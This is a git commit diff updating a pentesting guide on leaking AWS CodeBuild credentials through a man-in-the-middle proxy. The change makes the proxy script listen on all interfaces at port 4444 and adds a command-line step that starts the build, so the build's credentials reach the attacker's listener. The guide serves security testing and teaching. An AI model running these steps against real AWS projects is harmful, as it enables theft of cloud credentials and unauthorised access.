Merge pull request #129 from RealFakeAccount/fix-AWS-Codebuild-Token-Leakage-Via-insecureSSL

carlospolop · web-flow · commit 6439ce95d807 · 2024-12-26T23:48:19.000+01:00
Update aws-codebuild-token-leakage.md
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -149,7 +149,7 @@ aws codebuild update-project --name <proj-name> \
 from mitm import MITM, protocol, middleware, crypto
 
 mitm = MITM(
-    host="127.0.0.1",
+    host="0.0.0.0",
     port=4444,
     protocols=[protocol.HTTP], 
     middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
@@ -158,7 +158,13 @@ mitm = MITM(
 mitm.run()
 ```
 
-* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+* Next, click on **Build the project** or start the build from command line:
+
+```sh
+aws codebuild start-build --project-name <proj-name>
+```
+
+* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
 
 <figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
